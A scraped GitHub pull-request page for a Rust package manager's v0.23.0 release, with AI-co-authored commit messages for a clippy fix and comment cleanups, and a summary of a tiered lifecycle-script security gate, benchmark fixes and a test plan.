Linux-only let-chain in parse_peak_rss CI lint on Linux failed on `clippy::collapsible_if` in the Linux-cfg'd branch of `parse_peak_rss`. The macOS branch had an intermediate `let bytes_str = rest.trim();` between the two `if let`s, which is why the local clippy run on macOS didn't catch this — only the macOS-cfg branch compiled there. Collapse the Linux branch to use `&&` (stable let-chains) so it satisfies the lint while preserving the same semantics. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin
added a commit
that referenced
this pull request
May 16, 2026
Strip phase numbers, trial labels, and date stamps from comments per the comment-cleanup plan. Keep all load-bearing technical content (libdeflate rationale, parent-dir memoization, exec-bit handling, 0o644-floor normalization). Pure comment edits, no code changes. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin
added a commit
that referenced
this pull request
May 16, 2026
This reverts commit cd407d6.
tolgaergin
added a commit
that referenced
this pull request
May 16, 2026
Strip phase/trial/audit-finding labels and date stamps from comments, rewrite the surviving doc blocks to be concise and load-bearing. Pure comment edits, no code changes. Net −154 lines. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin
added a commit
that referenced
this pull request
May 16, 2026
Strip phase/audit-finding labels and date stamps; rewrite doc blocks to be concise and load-bearing. Rename ambiguous `Phase 1/2/3/4` intra-linker pipeline references to `Stage 1/2/3/4` so they don't read like roadmap-phase numbers. Pure comment edits, no code changes. Net −70 lines. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Merges
phase-46ontomain, documenting the v0.23.0 release cuton 2026-04-23.
mainwas held pristine during the entire phase-46 developmentwindow (54 feature commits) so this merge is a clean fast-forward
with the full code change in a single PR, plus three tag-cut-day
commits (bench harness fix, perf fix, bench baseline).
Tag
v0.23.0was cut onphase-46 @ cb01216before this PR wasopened, and the Release workflow has already completed green:
binaries published to npm + Homebrew formula updated + wrapper
package refreshed. This PR is merge-only — not release-in-flight.
What's in 46.0
Ships the four-layer tiered lifecycle-script gate
(§4 of the plan doc):
--policy=deny|allow|triage+ trustsnapshot
zero false-positive reds)
--min-release-age+minimumReleaseAge)check) +
--ignore-provenance-drift[-all]overridesdelta render)
P8 (LLM triage) deferred to Phase 46.1. Hard preconditions
P5 + P6 ship here.
Tag-cut validation (§18)
Full validation doc:
a-package-manager/DOCS/new-features/37-rust-client-phase46-nextjs-validation.md(filled in on the companion branch, pushed separately to
tolgaergin/a-package-manager#phase-46-p4-server-side).Full bench baseline:
bench/baselines/2026-04-23-46.0-macos-arm64.md.Tag-cut day commits (this week)
ed001fa— bench harness honorsBENCH_WORK_DIR+BENCH_PROJECT_DIRenv overrides socold-install-cleandoesn't trigger VS Code
--no-ignorerg storms on theworkspace
f19d23e—install.rs > build_blocked_set_metadatafanoutvia
futures::future::join_all— serial per-package awaitscost ~770 ms on a 277-pkg tree, parallel cost ~200 ms
(noise-floor deny-mode delta)
4607f4f— macOS arm64 bench baseline for the 46.0 tag cutcb01216— version bump to 0.23.0Scope boundary (§17)
Project installs only. Global-install support for the tiered
gate ships in Phase 46.1 alongside LLM triage (P8).
Test plan
cargo clippy --workspace --all-targets -- -D warnings,cargo fmt --check, fancy-regex guard,cargo build --workspace,cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast— 4217/4217,cargo test -p lpm-auth× 3 — 47/47 eachv0.23.0green (npm + Homebrew + wrapper published)🤖 Generated with Claude Code